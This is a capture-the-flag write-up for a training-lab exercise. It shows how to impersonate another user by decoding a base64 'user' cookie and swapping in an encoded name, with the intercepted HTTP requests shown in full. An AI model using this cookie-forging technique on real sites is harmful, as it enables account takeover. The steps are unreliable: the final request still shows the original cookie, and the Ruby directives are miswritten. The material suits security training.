Level 9 | A2 Broken Authentication and Session Management

It seems you were automatically logged in as John Doe. Try to find a way to be logged in as the user Mary Jane in order to see her profile.

Target:

• http://ctf.infosecinstitute.com/ctf2/exercises/ex9.php

Tools:

• Firefox
• BurpSuite

Intercept the Request, you'll find

GET /ctf2/exercises/ex9.php HTTP/1.1
Host: ctf.infosecinstitute.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7v78334lr06v6j051f4epsj3e6; user=Sk9ITitET0U%3D
Connection: keep-alive

the user variable contains base46 value, decoding using BrupSuite decoder or using ruby "Sk9ITitET0U=".unpack"0m" gives us Sk9ITitET0U= = John+Doe No to access as Mary Jane we have to encode it using ruby ["Mary+Jane"].pack"0m" the rsult it: Mary+Jane = TWFyeStKYW5l

then change the Cookie to be

GET /ctf2/exercises/ex9.php HTTP/1.1
Host: ctf.infosecinstitute.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7v78334lr06v6j051f4epsj3e6; user=Sk9ITitET0U%3D
Connection: keep-alive

Then allow request to go

Done!